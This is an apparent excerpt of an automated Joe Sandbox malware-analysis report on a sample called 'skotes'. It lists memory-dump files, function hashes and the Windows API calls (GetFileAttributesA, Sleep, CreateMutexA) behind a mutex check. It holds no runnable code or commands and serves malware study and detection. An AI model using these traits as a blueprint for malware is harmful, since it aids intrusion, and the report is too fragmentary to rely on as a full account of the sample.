Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID: nC
API String ID: 2531987475-4036674207
Opcode ID: d3e847d8fb795cb0ab60003ea31c6dedf716b9b5f76bb9eb01b7f141cf2473b5
Instruction ID: a1b8015cd240266200e5698a1a198d2f1f8f3a9fd9cfa43fb32f8d25280d9f6b
Opcode Fuzzy Hash: d3e847d8fb795cb0ab60003ea31c6dedf716b9b5f76bb9eb01b7f141cf2473b5
Instruction Fuzzy Hash: 5A414FB2904204ABDF38DFB6DC419AFBBF9EF48304B10542EF996D3611E6389901DB25

Function 00409BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00409BA8
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 08f92a05f9c75304395c953b5509735dec932995c3c34e53abd02f0ceb347bc9
Instruction ID: 9421d71f62ce756a7129686aefece872bdfada93f46d90f16c06ad0cb0e6c02a
Opcode Fuzzy Hash: 08f92a05f9c75304395c953b5509735dec932995c3c34e53abd02f0ceb347bc9
Instruction Fuzzy Hash: 50314A71B042048BFB08DB78DD897AEB772EBC2314F20862AE014AB3D6C77D59908759

Function 00409CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00409CDD
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 6e49bf92574a21576f9be51cf6606c679c746ece62c06a48e468700aa42a5a70
Instruction ID: f5c462dc8f46f485beba30ce7bb72fcf185bedc5a115e3e0c588d9f1771a50d7
Opcode Fuzzy Hash: 6e49bf92574a21576f9be51cf6606c679c746ece62c06a48e468700aa42a5a70
Instruction Fuzzy Hash: 97314871B042409BEB08DBB8CD8879DB762DF86314F24862AE014BB3D6C77D5990875A

Function 00409F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00409F47
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: c145d6abd894ff2c35d2bd2b048a1c56a826bda23181702ffb2160dccd21d726
Instruction ID: 94bf57435e7ecb271b92e75195642580707cab6687595885a0fa8c4225727492
Opcode Fuzzy Hash: c145d6abd894ff2c35d2bd2b048a1c56a826bda23181702ffb2160dccd21d726
Instruction Fuzzy Hash: 6F316A717002049BEB08DB78CD887ADB762EB86314F24862EE014FB3D6C77D5990875A

Function 0040A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A07C
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2F
API String ID: 396266464-3862687658
Opcode ID: 902dad6272693aeffb8be7e367cd820772d55244c09b63cee59c9c0e5c190089
Instruction ID: 8e153fa7d40102c24aaa963aafa6dfa626bba0ce3868673fe63fb296b2a7529f
Opcode Fuzzy Hash: 902dad6272693aeffb8be7e367cd820772d55244c09b63cee59c9c0e5c190089
Instruction Fuzzy Hash: 15314A72B003049BEB08DBB8CD897ADB772DB86314F24862EE014AB3D5C77D5990865B

Function 0040A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0040A1B1
Sleep.KERNEL32(00000064,?), ref: 0040A963
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
